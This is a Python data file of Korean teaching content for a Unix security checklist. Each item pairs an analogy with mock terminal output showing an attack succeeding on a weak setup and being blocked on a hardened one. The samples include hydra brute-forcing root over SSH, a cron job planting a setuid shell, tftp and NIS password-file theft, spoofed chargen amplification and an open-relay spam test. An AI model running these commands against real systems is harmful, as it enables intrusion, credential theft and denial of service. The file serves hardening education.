# -*- coding: utf-8 -*-
DYN = {
 'U-34': {
   'easy': 'Finger 서비스는 회사 <b>전 직원 명단</b>을 현관에 붙여 둔 것과 같습니다. 누가 언제 출근했는지, 자리는 어디인지 외부인이 다 볼 수 있죠. 공격자는 이 명단으로 공격할 계정을 손쉽게 고릅니다.',
   'attack_label': '공격자가 원격에서 시스템 사용자 목록을 캐낸다',
   'attack_vuln': [
     ['cmt', '# 공격자가 finger로 서버 사용자 정보를 조회'],
     ['prompt', 'attacker$ finger @victim.com'],
     ['', 'Login    Name       TTY   Idle  Login Time'],
     ['bad', '>> admin    Administrator  pts/0   1d  Jun 19'],
     ['bad', '>> oracle   DB Operator    -       -   계정 명단 확보'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 계정 명단 유출', 'desc': 'Finger가 켜져 있어 로그인명과 활동 정보가 인증 없이 노출됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 공격을 안전한 설정에서 시도'],
     ['prompt', 'attacker$ finger @victim.com'],
     ['good', '>> connect: Connection refused'],
     ['warn', '>> 사용자 목록을 얻을 수 없음'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 조회 거부', 'desc': 'Finger를 비활성화하여 외부에서 사용자 정보를 조회할 수 없습니다.'},
 },
 'U-35': {
   'easy': '익명 FTP는 <b>잠그지 않은 창고 문</b>과 같습니다. 이름도 묻지 않고 아무나 들어와 물건을 가져가거나 쓰레기를 버릴 수 있죠. 공격자는 자료를 빼가거나 악성파일을 올려 둡니다.',
   'attack_label': '공격자가 인증 없이 FTP로 파일을 빼가거나 올린다',
   'attack_vuln': [
     ['cmt', '# 공격자가 anonymous 계정으로 로그인'],
     ['prompt', 'attacker$ ftp victim.com'],
     ['', 'Name: anonymous   Password: (아무거나)'],
     ['bad', '>> 230 Login successful.'],
     ['bad', '>> get backup.sql / put shell.php  자료 탈취+업로드'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 무인증 파일 접근', 'desc': '익명 접속이 허용되어 누구나 파일을 내려받고 올릴 수 있습니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 anonymous 로그인을 시도'],
     ['prompt', 'attacker$ ftp victim.com'],
     ['good', '>> 530 Login incorrect.'],
     ['warn', '>> 익명 접속이 거부되어 진입 불가'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 익명 차단', 'desc': 'anonymous_enable=NO로 인증 없는 접속을 막아 파일에 접근할 수 없습니다.'},
 },
 'U-36': {
   'easy': 'r 계열 서비스는 <b>옆집이라고 말하면 그냥 들여보내는 경비</b>와 같습니다. 신분 확인 없이 신뢰만으로 문을 열어 주고, 대화 내용도 평문이라 엿들리죠. 공격자는 신뢰 관계를 흉내 내 그대로 들어옵니다.',
   'attack_label': '공격자가 신뢰관계를 악용해 비밀번호 없이 접속한다',
   'attack_vuln': [
     ['cmt', '# 공격자가 rlogin으로 신뢰 기반 접속 시도'],
     ['prompt', 'attacker$ rlogin victim.com -l root'],
     ['', '.rhosts 신뢰 항목 확인 중 ...'],
     ['bad', '>> Last login: ... 비밀번호 없이 통과'],
     ['bad', '>> victim# root 쉘 획득'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 인증 우회', 'desc': 'r 서비스의 신뢰기반 인증으로 비밀번호 없이 접속이 허용됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 rlogin 접속을 시도'],
     ['prompt', 'attacker$ rlogin victim.com -l root'],
     ['good', '>> connect: Connection refused'],
     ['warn', '>> SSH만 열려 있어 신뢰 악용 불가'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 서비스 비활성', 'desc': 'r 서비스를 끄고 SSH로 대체하여 신뢰기반 우회가 통하지 않습니다.'},
 },
 'U-37': {
   'easy': 'cron 접근제어가 없으면 <b>누구나 회사 자동화 스위치를 만질 수 있는</b> 상태입니다. 일반 직원이 한밤중에 몰래 실행될 작업을 심어 둘 수 있죠. 공격자는 이를 이용해 관리자 권한을 노립니다.',
   'attack_label': '일반 사용자가 예약작업으로 권한 상승을 노린다',
   'attack_vuln': [
     ['cmt', '# 권한 없는 사용자가 cron에 작업 등록'],
     ['prompt', 'user$ crontab -e   (제한 없음)'],
     ['', '* * * * * cp /bin/sh /tmp/s; chmod 4755 /tmp/s'],
     ['bad', '>> 작업이 정상 등록됨 (no restriction)'],
     ['bad', '>> /tmp/s 실행 → root 권한 획득'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 권한 상승', 'desc': 'cron 사용이 통제되지 않아 일반 사용자가 악성 예약작업을 심을 수 있습니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 일반 사용자가 cron 등록 시도'],
     ['prompt', 'user$ crontab -e'],
     ['good', '>> You are not allowed to use this program'],
     ['warn', '>> cron.allow에 없어 작업 등록 불가'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 사용 제한', 'desc': 'cron.allow로 허용 계정만 등록 가능해 일반 사용자는 작업을 만들 수 없습니다.'},
 },
 'U-38': {
   'easy': 'echo/chargen 같은 단순 서비스는 <b>아무 말이나 외치면 똑같이 메아리쳐 주는 확성기</b>와 같습니다. 공격자가 남의 주소를 사칭해 외치면 메아리가 피해자에게 쏟아지죠. 트래픽을 증폭해 마비시키는 데 악용됩니다.',
   'attack_label': '공격자가 단순 서비스로 증폭 DoS를 일으킨다',
   'attack_vuln': [
     ['cmt', '# 공격자가 피해자 IP를 사칭해 chargen 자극'],
     ['prompt', 'attacker$ hping3 --udp -p 19 -a victim srv'],
     ['', 'chargen(19)이 끝없는 문자열을 응답 생성'],
     ['bad', '>> 응답 폭주가 victim에게 반사됨'],
     ['bad', '>> 대역폭 포화 → 서비스 마비'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 증폭 DoS', 'desc': '단순 서비스가 열려 있어 반사·증폭 공격의 발판이 됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 chargen 포트를 자극 시도'],
     ['prompt', 'attacker$ hping3 --udp -p 19 -a victim srv'],
     ['good', '>> ICMP port unreachable (응답 없음)'],
     ['warn', '>> 증폭에 쓸 서비스가 없음'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 서비스 제거', 'desc': 'echo/discard/daytime/chargen을 비활성화하여 증폭 발판이 사라집니다.'},
 },
 'U-39': {
   'easy': 'NFS를 열어 두는 것은 <b>회사 공용 폴더를 인터넷에 그대로 붙여 둔</b> 것과 같습니다. 누가 마운트할 수 있는지 따지지 않으면 외부인이 통째로 가져갈 수 있죠. 공격자는 원격에서 디스크를 통째로 들여다봅니다.',
   'attack_label': '공격자가 원격에서 NFS 공유를 통째로 마운트한다',
   'attack_vuln': [
     ['cmt', '# 공격자가 export된 공유 목록을 조회'],
     ['prompt', 'attacker$ showmount -e victim.com'],
     ['', 'Export list for victim.com:'],
     ['bad', '>> /data *  (모두에게 공개)'],
     ['bad', '>> mount victim:/data /mnt → 파일 전부 열람'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 원격 마운트', 'desc': '불필요한 NFS가 구동되어 외부에서 파일시스템을 마운트할 수 있습니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 export 목록을 조회 시도'],
     ['prompt', 'attacker$ showmount -e victim.com'],
     ['good', '>> clnt_create: RPC: Program not registered'],
     ['warn', '>> 마운트할 공유를 찾을 수 없음'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 데몬 중지', 'desc': 'NFS 데몬을 중지하여 원격 마운트 자체가 불가능합니다.'},
 },
 'U-40': {
   'easy': 'NFS를 everyone에게 여는 것은 <b>창고 열쇠를 복사해 길거리에 뿌리는</b> 것과 같습니다. 특정 사람만 받게 하지 않으면 아무나 들어와 물건을 바꿔치기하죠. 공격자는 root 권한까지 흉내 내 파일을 조작합니다.',
   'attack_label': '공격자가 공개 공유를 마운트해 데이터를 변조한다',
   'attack_vuln': [
     ['cmt', '# 공격자가 * 공유를 자기 PC에 마운트'],
     ['prompt', 'attacker$ mount -t nfs victim:/data /mnt'],
     ['', '/data가 *(rw,no_root_squash)로 공개됨'],
     ['bad', '>> root 권한으로 파일 쓰기 가능'],
     ['bad', '>> 중요 파일 변조 + 백도어 삽입 성공'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 데이터 변조', 'desc': 'everyone(*) + no_root_squash로 누구나 root 권한 쓰기가 가능합니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 공유 마운트를 시도'],
     ['prompt', 'attacker$ mount -t nfs victim:/data /mnt'],
     ['good', '>> access denied by server'],
     ['warn', '>> 허용 호스트가 아니라 마운트 거부'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 접근통제', 'desc': '허용 호스트만 ro+root_squash로 제한해 외부 변조가 차단됩니다.'},
 },
 'U-41': {
   'easy': 'automountd는 <b>알아서 문을 여닫는 자동문</b>인데, 고장난 센서가 많아 엉뚱한 사람도 통과시키곤 합니다. 알려진 결함이 많아 공격자가 이를 비집고 권한을 높이죠. 안 쓰면 떼어내는 게 안전합니다.',
   'attack_label': '공격자가 automountd 취약점으로 권한을 높인다',
   'attack_vuln': [
     ['cmt', '# 공격자가 automountd RPC 취약점을 노림'],
     ['prompt', 'attacker$ rpcinfo -p victim | grep automount'],
     ['', '100099  3  udp  ...  automountd 등록 확인'],
     ['bad', '>> 알려진 RPC 취약점으로 명령 주입'],
     ['bad', '>> root 권한 코드 실행 성공'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 권한 상승', 'desc': 'automountd가 구동 중이라 알려진 RPC 취약점으로 공격당합니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 automountd 등록을 조회 시도'],
     ['prompt', 'attacker$ rpcinfo -p victim | grep automount'],
     ['good', '>> (출력 없음)'],
     ['warn', '>> 공격할 데몬이 존재하지 않음'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 데몬 제거', 'desc': 'autofs를 비활성화하여 취약한 RPC 진입점이 사라집니다.'},
 },
 'U-42': {
   'easy': '불필요한 RPC 서비스는 <b>안 쓰는데도 열려 있는 뒷문들</b>입니다. 문이 많을수록 그중 하나는 자물쇠가 고장나 있기 마련이죠. 공격자는 결함이 알려진 뒷문을 찾아 비집고 들어옵니다.',
   'attack_label': '공격자가 취약 RPC 데몬으로 원격 코드를 실행한다',
   'attack_vuln': [
     ['cmt', '# 공격자가 등록된 RPC 서비스를 스캔'],
     ['prompt', 'attacker$ rpcinfo -p victim.com'],
     ['', '100083 ... rpc.ttdbserverd 노출'],
     ['bad', '>> ttdbserverd 버퍼 오버플로우 익스플로잇'],
     ['bad', '>> 원격 코드 실행으로 시스템 장악'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 원격 코드 실행', 'desc': '취약한 RPC 서비스가 살아 있어 알려진 익스플로잇에 그대로 노출됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 RPC 서비스를 스캔 시도'],
     ['prompt', 'attacker$ rpcinfo -p victim.com'],
     ['good', '>> 취약 서비스 미등록 (필수 항목만)'],
     ['warn', '>> 공격 대상 데몬이 없음'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — RPC 최소화', 'desc': '불필요한 RPC를 비활성화해 알려진 취약점의 표적이 사라집니다.'},
 },
 'U-43': {
   'easy': 'NIS는 <b>전 직원 비밀번호 장부를 우편엽서로 돌려 보는</b> 방식입니다. 오가는 도중 누구나 펼쳐 볼 수 있어 계정 정보가 새죠. 공격자는 통신을 엿듣기만 해도 인증정보를 손에 넣습니다.',
   'attack_label': '공격자가 NIS 맵에서 계정·암호 정보를 빼낸다',
   'attack_vuln': [
     ['cmt', '# 공격자가 NIS 도메인의 passwd 맵을 덤프'],
     ['prompt', 'attacker$ ypcat -d corp -h victim passwd'],
     ['', 'NIS 서버가 맵 정보를 평문 응답'],
     ['bad', '>> root:x:0:0... / user:HASH... 계정 노출'],
     ['bad', '>> 해시 크랙으로 다수 계정 탈취'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 계정정보 유출', 'desc': 'NIS가 맵 정보를 평문으로 제공해 전체 계정이 노출됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 passwd 맵 덤프를 시도'],
     ['prompt', 'attacker$ ypcat -d corp -h victim passwd'],
     ['good', '>> Cant bind to server (NIS 미구동)'],
     ['warn', '>> 맵 정보를 얻을 수 없음'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — NIS 비활성', 'desc': 'NIS를 끄고 LDAPS로 대체하여 평문 계정정보 유출이 차단됩니다.'},
 },
 'U-44': {
   'easy': 'tftp는 <b>이름도 안 묻고 택배를 내주는 무인 보관함</b>과 같습니다. 아무나 와서 안의 파일을 가져갈 수 있죠. 공격자는 설정파일이나 부팅 이미지를 손쉽게 빼냅니다.',
   'attack_label': '공격자가 인증 없이 tftp로 시스템 파일을 가져간다',
   'attack_vuln': [
     ['cmt', '# 공격자가 tftp로 설정파일을 요청'],
     ['prompt', 'attacker$ tftp victim.com -c get /etc/passwd'],
     ['', '인증 절차 없이 파일 전송 시작'],
     ['bad', '>> Received 1843 bytes'],
     ['bad', '>> /etc/passwd 등 민감 파일 탈취 성공'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 무인증 파일 탈취', 'desc': 'tftp가 인증 없이 파일을 내주어 민감 파일이 그대로 유출됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 tftp로 파일을 요청'],
     ['prompt', 'attacker$ tftp victim.com -c get /etc/passwd'],
     ['good', '>> Transfer timed out (서비스 없음)'],
     ['warn', '>> 파일을 가져올 수 없음'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 서비스 비활성', 'desc': 'tftp/talk/ntalk를 비활성화해 무인증 파일 전송이 불가능합니다.'},
 },
 'U-45': {
   'easy': '구버전 Sendmail은 <b>도둑이 여는 법을 다 아는 옛날 자물쇠</b>입니다. 공개된 약점이 많아 누구나 손쉽게 따죠. 공격자는 버전만 확인하면 맞는 공격을 골라 씁니다.',
   'attack_label': '공격자가 구버전 메일서버의 알려진 취약점을 친다',
   'attack_vuln': [
     ['cmt', '# 공격자가 SMTP 배너로 버전을 확인'],
     ['prompt', 'attacker$ telnet victim.com 25'],
     ['', '220 victim ESMTP Sendmail 8.12.8'],
     ['bad', '>> 8.12.x 대상 공개 익스플로잇 적용'],
     ['bad', '>> 원격 코드 실행으로 메일서버 장악'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 알려진 취약점 악용', 'desc': '구버전 Sendmail이라 공개된 취약점으로 원격 장악이 가능합니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 버전을 확인 후 공격 시도'],
     ['prompt', 'attacker$ telnet victim.com 25'],
     ['good', '>> 220 ESMTP Sendmail 8.17.x'],
     ['warn', '>> 최신판이라 알려진 익스플로잇이 통하지 않음'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 최신 패치', 'desc': '최신 보안 버전을 유지해 알려진 취약점 공격이 막힙니다.'},
 },
 'U-46': {
   'easy': 'Sendmail 큐 실행을 누구나 할 수 있으면 <b>우체국 뒷방을 일반 손님이 드나드는</b> 격입니다. 남의 메일 처리에 끼어들어 정보를 엿볼 수 있죠. restrictqrun으로 직원만 들어가게 해야 합니다.',
   'attack_label': '일반 사용자가 메일 큐를 조작해 정보를 엿본다',
   'attack_vuln': [
     ['cmt', '# 권한 없는 사용자가 메일 큐를 강제 처리'],
     ['prompt', 'user$ sendmail -q -v'],
     ['', 'restrictqrun 미설정 → 실행 허용'],
     ['bad', '>> 큐에 쌓인 타인 메일의 발신/수신자 노출'],
     ['bad', '>> 메일 흐름 정보 수집 성공'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 큐 정보 노출', 'desc': 'restrictqrun이 없어 일반 사용자가 큐를 실행하고 메일 정보를 봅니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 큐 강제 처리를 시도'],
     ['prompt', 'user$ sendmail -q -v'],
     ['good', '>> You do not have permission to process the queue'],
     ['warn', '>> 일반 사용자는 큐를 실행할 수 없음'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 실행 제한', 'desc': 'restrictqrun으로 큐 실행을 제한해 일반 사용자의 오용이 막힙니다.'},
 },
 'U-47': {
   'easy': '오픈 릴레이는 <b>주인 없이 아무 편지나 대신 부쳐 주는 우체통</b>입니다. 스팸 발송자가 자기 흔적은 숨기고 우리 우체통을 빌려 쓰죠. 결국 우리 서버가 스팸 발송지로 차단당합니다.',
   'attack_label': '공격자가 메일서버를 경유해 스팸을 대량 발송한다',
   'attack_vuln': [
     ['cmt', '# 공격자가 외부->외부 메일 릴레이를 시도'],
     ['prompt', 'attacker$ swaks --server victim -t target@out.com'],
     ['', 'MAIL FROM:spam@evil.com  RCPT TO:target@out.com'],
     ['bad', '>> 250 Message accepted for delivery'],
     ['bad', '>> 우리 서버 경유로 스팸 대량 발송 성공'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 오픈 릴레이 악용', 'desc': '릴레이가 모두 허용되어 외부 스팸의 발송 경유지로 악용됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 외부->외부 릴레이를 시도'],
     ['prompt', 'attacker$ swaks --server victim -t target@out.com'],
     ['good', '>> 550 Relaying denied'],
     ['warn', '>> 허용 네트워크가 아니라 발송 거부'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 릴레이 제한', 'desc': 'access DB로 허용 네트워크만 릴레이해 스팸 경유가 차단됩니다.'},
 },
 'U-49': {
   'easy': '구버전 BIND는 <b>오래되어 잘못된 주소도 그냥 믿는 안내데스크</b>입니다. 공격자가 가짜 주소를 슬쩍 끼워 넣으면 손님을 엉뚱한 곳으로 보내죠. 캐시 변조나 원격 공격에 그대로 당합니다.',
   'attack_label': '공격자가 구버전 DNS의 캐시 포이즈닝을 노린다',
   'attack_vuln': [
     ['cmt', '# 공격자가 DNS 버전을 확인'],
     ['prompt', 'attacker$ dig @victim version.bind chaos txt'],
     ['', 'version.bind. ... 9.4.1'],
     ['bad', '>> 9.4.x 캐시 포이즈닝 취약점 악용'],
     ['bad', '>> 가짜 응답 주입으로 사용자 트래픽 가로채기'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 캐시 포이즈닝', 'desc': '구버전 BIND라 알려진 취약점으로 DNS 응답이 위조됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 버전 확인 후 공격 시도'],
     ['prompt', 'attacker$ dig @victim version.bind chaos txt'],
     ['good', '>> (버전 숨김 / 최신 9.18.x)'],
     ['warn', '>> 알려진 취약점이 통하지 않음'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 최신 패치', 'desc': '최신 BIND 유지와 버전 은닉으로 캐시 포이즈닝이 차단됩니다.'},
 },
 'U-50': {
   'easy': 'Zone Transfer를 열어 두면 <b>회사 전체 좌석 배치도를 통째로 복사해 주는</b> 셈입니다. 어떤 서버가 어디 있는지 지도가 통째로 넘어가죠. 공격자는 이 지도로 다음 표적을 정합니다.',
   'attack_label': '공격자가 전체 도메인 정보를 통째로 가져간다',
   'attack_vuln': [
     ['cmt', '# 공격자가 zone transfer(axfr)를 요청'],
     ['prompt', 'attacker$ dig @victim corp.com axfr'],
     ['', '서버가 전체 zone 레코드를 전송'],
     ['bad', '>> www / mail / db / vpn 모든 호스트-IP 노출'],
     ['bad', '>> 내부 구조 지도 확보 → 표적 선정'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 도메인 정보 유출', 'desc': 'allow-transfer 제한이 없어 누구나 전체 zone을 가져갑니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 axfr 전송을 요청'],
     ['prompt', 'attacker$ dig @victim corp.com axfr'],
     ['good', '>> Transfer failed (refused)'],
     ['warn', '>> 인가된 보조 DNS가 아니라 전송 거부'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 전송 제한', 'desc': 'allow-transfer로 보조 DNS만 허용해 외부 axfr이 거부됩니다.'},
 },
 'U-59': {
   'easy': '불필요한 SNMP는 <b>꺼 두는 걸 깜빡한 상태 표시 모니터</b>와 같습니다. 장비의 속사정이 외부 복도에 그대로 비치죠. 안 쓰는데 켜 두면 공격자에게 정찰 정보를 공짜로 줍니다.',
   'attack_label': '공격자가 SNMP로 시스템 내부 정보를 정찰한다',
   'attack_vuln': [
     ['cmt', '# 공격자가 SNMP 포트 구동 여부를 스캔'],
     ['prompt', 'attacker$ nmap -sU -p 161 victim.com'],
     ['', '161/udp open  snmp'],
     ['bad', '>> snmpwalk로 OS/프로세스/인터페이스 조회'],
     ['bad', '>> 시스템 내부 정보 정찰 성공'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 정보 정찰', 'desc': '불필요한 SNMP가 켜져 있어 시스템 정보가 외부에 노출됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 SNMP 포트를 스캔'],
     ['prompt', 'attacker$ nmap -sU -p 161 victim.com'],
     ['good', '>> 161/udp closed'],
     ['warn', '>> 조회할 SNMP 서비스가 없음'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 서비스 중지', 'desc': 'SNMP를 비활성화하여 외부에서 시스템 정보를 조회할 수 없습니다.'},
 },
 'U-61': {
   'easy': 'community string이 public이면 <b>금고 비밀번호를 0000으로 둔</b> 것과 같습니다. 누구나 기본값을 알기에 그냥 열어 보죠. 공격자는 정보를 읽고, private까지 기본값이면 설정을 바꿔 버립니다.',
   'attack_label': '공격자가 기본 커뮤니티로 정보를 읽고 변조한다',
   'attack_vuln': [
     ['cmt', '# 공격자가 기본 community string으로 조회'],
     ['prompt', 'attacker$ snmpwalk -v2c -c public victim'],
     ['', 'public이 그대로 통과됨'],
     ['bad', '>> 계정/라우팅/프로세스 등 전체 정보 열람'],
     ['bad', '>> -c private 쓰기로 설정 변조까지 성공'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 정보 열람·변조', 'desc': '기본 community(public/private)라 누구나 정보를 읽고 변경합니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 기본 커뮤니티로 조회 시도'],
     ['prompt', 'attacker$ snmpwalk -v2c -c public victim'],
     ['good', '>> Timeout: No Response (인증 실패)'],
     ['warn', '>> 추측 불가 값+소스 제한으로 접근 불가'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 강한 인증', 'desc': '복잡한 community와 소스 제한(또는 SNMPv3)으로 무단 접근이 막힙니다.'},
 },
}

# ===== 계정 관리 (U-01~U-06) =====
DYN.update({
 'U-01': {
   'easy': '은행에서 <b>금고실 문이 현관 바로 앞에 있고, 지점장 이름만 대면 열리는 것</b>과 같습니다. root 원격 로그인을 허용하면 최고 권한 문이 인터넷이라는 현관 바로 앞에 놓인 셈입니다. 문 하나(일반 계정)를 더 거치게 하면 공격자는 두 겹을 뚫어야 합니다.',
   'attack_label': '공격자가 인터넷에서 root 계정 무차별 대입을 시도한다',
   'attack_vuln': [
     ['cmt', '# 공격자가 SSH로 root 직접 로그인 시도'],
     ['prompt', 'attacker$ hydra -l root -P rockyou.txt ssh://victim.com'],
     ['bad', '[ATTEMPT] target 22 - login "root" - pass "admin123"'],
     ['bad', '[22][ssh] host: victim.com  login: root   password: toor'],
     ['bad', '>> 5번째 시도 만에 root 로그인 성공 — 곧바로 최고 권한 획득'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 즉시 최고 권한', 'desc': 'root 직접 로그인이 열려 있어 비밀번호 한 번이 뚫리는 순간 시스템 전체가 넘어갑니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 공격을 안전한 설정에서 시도'],
     ['prompt', 'attacker$ hydra -l root -P rockyou.txt ssh://victim.com'],
     ['good', '[ATTEMPT] target 22 - login "root" - pass "admin123"'],
     ['good', '>> [ssh] host: victim.com   login: root   password: (거부됨)'],
     ['warn', '>> root 계정은 애초에 원격 직접 로그인 불가'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — root 원격 로그인 금지', 'desc': 'PermitRootLogin no로 root 직접 접속이 불가하여 공격 표면이 한 겹 줄어듭니다.'},
 },
 'U-02': {
   'easy': '사무실 출입 비밀번호를 <b>4자리로 6개월째 안 바꾸는 것</b>과 같습니다. 짧고 오래 쓴 비밀번호는 복사해 둔 사람이 언제든 들어올 수 있죠. 90일마다 8자 이상으로 강제하면 훔친 번호의 수명이 짧아집니다.',
   'attack_label': '공격자가 오래된·단순한 비밀번호 목록으로 로그인을 시도한다',
   'attack_vuln': [
     ['cmt', '# 유출 추정 목록(3년 묵은 번호)으로 시도'],
     ['prompt', 'attacker$ ssh user01@victim.com'],
     ['', 'password: user2018'],
     ['bad', '>> PASS_MAX_DAYS=99999 — 3년간 변경 없음 확인'],
     ['bad', '>> Last login: 접속 성공 — 오래된 비밀번호 그대로 유효'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 낡은 비밀번호 통과', 'desc': '주기·복잡도 정책이 없어 몇 년 된 약한 비밀번호가 그대로 통과합니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 오래된 비밀번호로 시도'],
     ['prompt', 'attacker$ ssh user01@victim.com'],
     ['good', '>> 90일 주기 강제로 이미 변경된 비밀번호'],
     ['good', '>> Authentication failed (Permission denied)'],
     ['warn', '>> minlen=8 + 조합 강제로 사전 대입도 어려움'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 주기·복잡도 정책', 'desc': '90일 주기와 8자 이상 복잡도 강제로 오래된·단순한 비밀번호가 무효화됩니다.'},
 },
 'U-03': {
   'easy': '출입증을 몇 번 틀려도 <b>경비가 아무도 막지 않는 자동문</b>과 같습니다. 공격자는 밤새 번호를 하나씩 눌러 볼 수 있죠. 5번 틀리면 문을 잠그는 규칙이 있어야 합니다.',
   'attack_label': '공격자가 자동화 스크립트로 비밀번호를 계속 시도한다',
   'attack_vuln': [
     ['cmt', '# 무차별 대입 스크립트 실행 (잠금 정책 없음)'],
     ['prompt', 'attacker$ for p in $(cat dict.txt); do ssh user01@v $p; done'],
     ['', '시도 3,412회 ... 계속 진행 중'],
     ['bad', '>> 실패 제한 없음 — 시도 무제한 허용'],
     ['bad', '>> 시도 8,905회: password "qwer1234!" 로그인 성공'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 무한 대입', 'desc': '실패 임계값이 없어 공격자가 몇 번이든 시도하다 결국 비밀번호를 찾아냅니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 스크립트를 잠금 정책 하에서 실행'],
     ['prompt', 'attacker$ for p in $(cat dict.txt); do ssh user01@v $p; done'],
     ['good', '>> 5회 실패: 계정 잠금 (pam_faillock deny=5)'],
     ['good', '>> 이후 모든 시도 즉시 거부 — 해제는 관리자만'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 계정 자동 잠금', 'desc': '5회 실패 시 계정이 잠기고 600초 유지되어 무차별 대입이 원천 차단됩니다.'},
 },
 'U-04': {
   'easy': '모든 사원이 읽을 수 있는 <b>게시판에 비밀번호 전체 명단을 붙여 둔 것</b>과 같습니다. 원래 해시는 잠긴 서랍(shadow)에 있어야 하는데, passwd 파일에 박제되면 아무나 몰래 사본을 들고 가 두고두고 풀어봅니다.',
   'attack_label': '공격자가 일반 권한으로 해시 목록을 덤프해 오프라인으로 푼다',
   'attack_vuln': [
     ['cmt', '# 일반 사용자 권한으로 passwd 확인'],
     ['prompt', 'user01$ head -3 /etc/passwd'],
     ['bad', 'root:x4TgZ9mQ2...:0:0:root:/root:/bin/bash'],
     ['bad', '>> 해시가 통째로 노출 — 파일을 통째로 복사'],
     ['bad', '>> john the ripper: user02 = summer2024 (해독 완료)'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 전 계정 해시 유출', 'desc': '해시가 모든 사용자에게 읽혀 오프라인 무차별 대입으로 계정들이 하나씩 뚫립니다.'},
   'attack_secure': [
     ['cmt', '# 동일하게 passwd 확인'],
     ['prompt', 'user01$ head -3 /etc/passwd'],
     ['good', 'root:x:0:0:root:/root:/bin/bash'],
     ['good', '>> x 표시 — 실제 해시는 /etc/shadow(400, root만)'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 해시 격리', 'desc': 'pwconv로 해시가 shadow로 분리되어 일반 사용자가 읽을 수 없습니다.'},
 },
 'U-05': {
   'easy': '사원증 번호가 <b>사장과 똑같은 아르바이트생</b>이 있는 상황입니다. 시스템은 번호(UID 0)만 보고 전원에게 사장 권한을 줍니다. 감사 로그에도 누가 사장인지 구분되지 않죠.',
   'attack_label': '공격자가 몰래 심어 둔 UID 0 계정으로 root 권한에 들어온다',
   'attack_vuln': [
     ['cmt', '# 침해 후 심어둔 백도어 계정 사용'],
     ['prompt', 'attacker$ ssh sysadm@victim.com'],
     ['', 'password: ********'],
     ['bad', '>> id: uid=0(root) gid=0(root) groups=0(root)'],
     ['bad', '>> 이름은 sysadm이지만 권한은 root와 동일 — 은신 유지'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 숨은 최고 권한', 'desc': 'UID 0 계정이 여럿이면 감사 로그에서 침입자 계정이 root처럼 위장됩니다.'},
